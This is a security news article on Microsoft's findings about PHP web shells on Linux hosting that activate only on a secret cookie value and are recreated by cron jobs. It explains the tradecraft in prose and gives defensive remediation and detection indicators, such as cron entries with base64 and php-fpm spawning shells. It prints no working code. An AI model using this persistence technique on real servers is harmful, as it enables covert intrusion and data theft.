Microsoft Exposes Cookie-Controlled PHP Web Shells That Resurrect Themselves via Cron — A New Stealthy Linux Persistence Technique - CyberTimes

Severity🟠 HIGH

CVSS Score8.2/10

ExploitedYes — active

Fix StatusCheck required

The Microsoft Defender Security Research Team has published detailed technical findings on an increasingly prevalent and sophisticated cybersecurity threat targeting Linux web hosting environments — PHP web shells that use HTTP cookies as a hidden control channel and cron jobs for self-healing persistence. The technique is a significant evolution in web shell tradecraft because it separates persistence from activation into two completely independent mechanisms, making it resistant to standard incident response procedures and nearly invisible to traditional detection tools. The web shell remains entirely dormant during normal traffic and only activates when an attacker sends an HTTP request containing a specific cookie value — leaving no observable footprint in routine application logs. Even when defenders discover and delete the malicious PHP file, a cron job recreates it automatically on the next scheduled execution cycle.

Affected products

·Linux shared hosting environments running PHP web applications
·Hosting environments using cPanel, jailshell, or similar control panel platforms
·PHP applications running under php-fpm, Apache, or Nginx on Linux
·Any Linux web server where cron is available at the account level

How to Fix

Step-by-step remediation

Effective remediation requires addressing both halves of the attack simultaneously — the cron job and the PHP loader — in the correct order. Removing only the PHP loader without finding the cron job means the loader will be recreated within minutes. Start by auditing your cron jobs using crontab -l for the web server account and any hosting account users. Look specifically for entries referencing base64 decoding, temporary file locations, or PHP file creation in web directories. Remove any suspicious cron entries first using crontab -e. Then search your web-accessible directories for recently created PHP files using find commands filtered by modification time. Look for PHP files containing $_COOKIE superglobal references used in execution control logic rather than normal session management. After removing both the cron job and the PHP loader, rotate all hosting account credentials — cPanel password, SSH keys, FTP credentials, and database passwords. Enable MFA on your hosting control panel immediately. For ongoing protection, implement monitoring for web server processes spawning shell interpreters — process ancestry showing php-fpm or apache2 spawning bash or dash is a high-signal indicator of web shell execution.

What happened

Traditional PHP web shells expose their command execution functionality through URL parameters or HTTP request bodies — making them detectable through standard web application firewall rules, log analysis, and file integrity monitoring. This technique takes a fundamentally different approach that exploits a simple but powerful property of PHP: the $_COOKIE superglobal variable, which makes HTTP cookie values available to PHP code at runtime without any additional parsing or input handling. Threat actors deploy PHP loaders that contain no obvious malicious functionality in their static code — the entire execution logic is gated behind a cookie value check. When a normal user or security scanner visits the page, the PHP loader does nothing. When the attacker sends a request with the specific cookie value they control, the web shell activates, processes commands, and can write secondary payloads to disk — all while appearing as ordinary PHP execution in the web server logs. This cookie-based gating means the web shell's network security footprint is minimal and its information security impact can go undetected for extended periods. Microsoft noted that this behavior extends beyond simple web requests to scheduled tasks and trusted background workers, creating multiple activation pathways that compound the detection challenge.

Real-World Impact

The digital security and data security implications of this technique are significant for any organisation running PHP applications on Linux hosting infrastructure. Shared hosting environments are particularly vulnerable because tenant isolation is only as strong as the account boundary — a compromised hosting account can be used to deploy web shells that affect all web properties hosted under that account. The technique does not require the attacker to have root-level server access, which means it operates below the detection threshold of many server-level security monitoring tools that focus on system-level changes. From a computer security perspective, the persistent RCE channel established by this technique gives attackers ongoing access to the compromised web application — the ability to read and modify web content, exfiltrate data processed by the application, harvest credentials submitted through forms, inject malicious code into pages served to users, and use the compromised server as a pivot point for further attacks on connected systems. Microsoft emphasised that the consistent reuse of cookie-based control across multiple observed implementations suggests this is established web shell tradecraft being shared and reused across different threat actors rather than a technique unique to a single campaign.

Technical Details

Microsoft Defender Security Research Team published the findings on April 2, 2026. The MITRE ATT&CK techniques involved are T1505.003 (Server Software Component: Web Shell), T1053.003 (Scheduled Task/Job: Cron), T1027 (Obfuscated Files or Information), T1140 (Deobfuscate/Decode Files or Information), T1059.004 (Command and Scripting Interpreter: Unix Shell), and T1222.002 (File and Directory Permissions Modification). The technique was observed in restricted shell environments including cPanel's jailshell — which limits the attacker to user-level control within the account's isolated environment but is still sufficient to modify web content, deploy PHP scripts, and register cron jobs. The self-healing PHP loader is typically reconstructed using inline base64 decoding commands embedded in the cron entry. File permissions are set restrictively post-reconstruction to complicate removal during incident response. No single CVE is associated with this technique as it is a post-exploitation persistence method rather than a specific vulnerability — initial access vectors vary and include credential theft and exploitation of known vulnerabilities in web applications.

🛡️ Prevention Tips

This technique represents a classic living-off-the-land approach applied to Linux hosting infrastructure. The attacker uses no exotic tools — cron, base64, PHP, cPanel are all standard components of any PHP hosting environment. From an infosec standpoint, the prevention requires shifting from artefact-based detection to behaviour-based detection. Microsoft's guidance focuses on detecting suspicious process ancestry — PHP processes spawning shell interpreters, cron jobs writing PHP files to web directories, base64 decoding operations initiated by web-facing processes — rather than looking for specific file hashes or known malicious strings. Credential hygiene is the first line of defence since initial access often comes through valid credentials. MFA on hosting control panels directly addresses this. Restricting the capabilities of web server processes — preventing php-fpm from spawning shell processes — limits what an attacker can do even if they achieve initial access. Regular auditing of cron jobs across all hosting accounts should be a standard part of any Linux web hosting security programme. Internet security monitoring that correlates web server process ancestry with file creation events in web directories provides the most reliable detection signal for this class of attack.

FAQs

How do I check if my Linux hosting account has a malicious cron job?

Run crontab -l to list all cron jobs registered for your current user. Look for any entry that references base64, contains long encoded strings, writes files to web-accessible directories, or runs shell scripts from /tmp/ or similar locations. Any cron entry you did not explicitly create yourself should be investigated immediately.

My hosting provider manages my Linux server — does this affect me?

Yes if your website runs PHP on Linux hosting. This technique operates at the hosting account level, not the server level — it does not require root access. Any PHP website on shared or managed Linux hosting where the attacker has obtained your hosting account credentials is potentially affected.

I deleted the malicious PHP file but it keeps coming back — why?

This is the self-healing mechanism Microsoft documented. The PHP loader is being recreated by a cron job on a scheduled basis. Deleting only the PHP file without first removing the cron job means it will be recreated on the next execution cycle. Find and remove the cron job first using crontab -e, then delete the PHP file, then rotate your credentials.

Do I need to reinstall my entire server if I find this technique on my hosting account?

Not necessarily, but full remediation requires: removing the cron job, deleting the PHP loader, rotating all credentials, and auditing your web application files for any secondary payloads that may have been written by the activated web shell. If the web shell was active for an extended period, assume any data processed by your application during that time may have been compromised.

Google's 24-Hour Android Sideloading Wait: What It Means for You and Why It Exists

masjesu · xorbot

Masjesu Botnet: The Stealthy DDoS-for-Hire Service Quietly Hijacking IoT Devices Since 2023 — Now Hitting 300 Gbps

cve 2026 34040 · docker

CVE-2026-34040: Docker AuthZ Plugin Bypass Lets Attackers Escape Containers and Gain Full Host Access — AI Agents Can Trigger It Automatically

openai · chatgpt

OpenAI Patches Two Critical Vulnerabilities: ChatGPT Data Exfiltration via Side Channel and Codex Command Injection Exposing GitHub Tokens

north korea · dprk